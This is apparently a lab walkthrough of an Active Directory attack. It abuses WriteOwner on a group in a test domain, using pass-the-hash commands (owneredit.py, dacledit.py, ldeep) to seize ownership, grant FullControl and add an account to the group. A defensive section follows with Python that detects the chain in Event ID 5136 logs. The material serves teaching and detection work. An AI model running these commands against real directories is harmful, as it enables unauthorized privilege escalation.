WriteOwner on Group (EmpireState -> CentralPark)

  • With the WriteOwner privilege on CentralPark, we can change the owner of the group to an account we control

  • Just like before, we will use the Impacket fork

ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 membersof 'CentralPark'

Read The Owner Permission

owneredit.py -action read -target 'CentralPark' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' NewYork.local/Nicolas.Maduro

Edit The Owner Permission

We are going to make Nicolas.Maduro the owner of the CentralPark group!

owneredit.py -action write -owner 'Nicolas.Maduro' -target 'CentralPark' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' NewYork.local/Nicolas.Maduro
  • And the owner of CentralPark group is now Nicolas.Maduro

  • As owner of the group, we can now change its ACL and give ourselves GenericAll (FullControl in dacledit.py) on the group

dacledit.py -action 'write' -rights 'FullControl' -principal Nicolas.Maduro  -target 'CentralPark' 'NewYork.local'/'Nicolas.Maduro' -hashes ':b3b3717f7d51b37fb325f7e7d048e998'
  • With GenericAll, we can now add Nicolas.Maduro to the CentralPark group

ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 add_to_group "CN=Nicolas.Maduro,OU=SugarHill,DC=NewYork,DC=local" "CN=CentralPark,OU=WestSide,DC=NewYork,DC=local"

Nicolas.Maduro is now a member of the group:

ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 membersof 'CentralPark'
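
On the defensive side, the chain above (owner change, then ACL write, then member add) leaves a recognizable trail in Event ID 5136 on the domain controller. The following is an added detection example, not part of the original walkthrough; it assumes "Audit Directory Service Changes" and a SACL on the group are enabled and that events were flattened to dicts, and the SID, timestamps and SDDL strings are constructed sample values.

```python
import re
from datetime import datetime, timedelta

VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"  # 5136 OperationType codes
T0 = datetime(2024, 1, 1, 12, 0, 0)                # constructed timestamp
ACTOR = "S-1-5-21-1111111111-2222222222-3333333333-1105"  # constructed SID
GROUP = "CN=CentralPark,OU=WestSide,DC=NewYork,DC=local"

def sddl_owner(sddl):
    """Return the owner component (O:) of an SDDL string, or None."""
    m = re.match(r"O:(.+?)(?=G:|D:|S:|$)", sddl or "")
    return m.group(1) if m else None

def find_owner_takeover_chains(events, window=timedelta(minutes=30)):
    """Flag actors who change a group's owner, then edit its member list."""
    events = sorted(events, key=lambda e: e["time"])
    old_owner = {}     # (actor, dn) -> owner in the deleted descriptor value
    owner_change = {}  # (actor, dn) -> (time, new owner)
    hits = set()
    for e in events:
        if e.get("ObjectClass") != "group":
            continue
        key = (e["SubjectUserSid"], e["ObjectDN"])
        attr, op = e["AttributeLDAPDisplayName"], e["OperationType"]
        if attr == "nTSecurityDescriptor":
            owner = sddl_owner(e["AttributeValue"])
            if op == VALUE_DELETED:
                old_owner[key] = owner
            elif op == VALUE_ADDED and owner != old_owner.get(key, owner):
                owner_change[key] = (e["time"], owner)
        elif attr == "member" and op == VALUE_ADDED and key in owner_change:
            changed_at, owner = owner_change[key]
            if e["time"] - changed_at <= window:
                hits.add((key[0], key[1], owner))
    return sorted(hits)

def _ev(sec, attr, op, value):
    """Build one constructed 5136 record (assumed flattened shape)."""
    return {"time": T0 + timedelta(seconds=sec), "SubjectUserSid": ACTOR,
            "ObjectDN": GROUP, "ObjectClass": "group",
            "AttributeLDAPDisplayName": attr, "OperationType": op,
            "AttributeValue": value}

SAMPLE = [  # constructed events mirroring the three steps above
    _ev(0, "nTSecurityDescriptor", VALUE_DELETED, "O:DAG:DAD:AI(A;;RPWP;;;DA)"),
    _ev(1, "nTSecurityDescriptor", VALUE_ADDED, f"O:{ACTOR}G:DAD:AI(A;;RPWP;;;DA)"),
    _ev(60, "member", VALUE_ADDED, "CN=Nicolas.Maduro,OU=SugarHill,DC=NewYork,DC=local"),
]

print(find_owner_takeover_chains(SAMPLE))
```

A later descriptor write that leaves the owner unchanged (the dacledit.py step) does not reset the match, so the member add is still tied to the original owner change.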
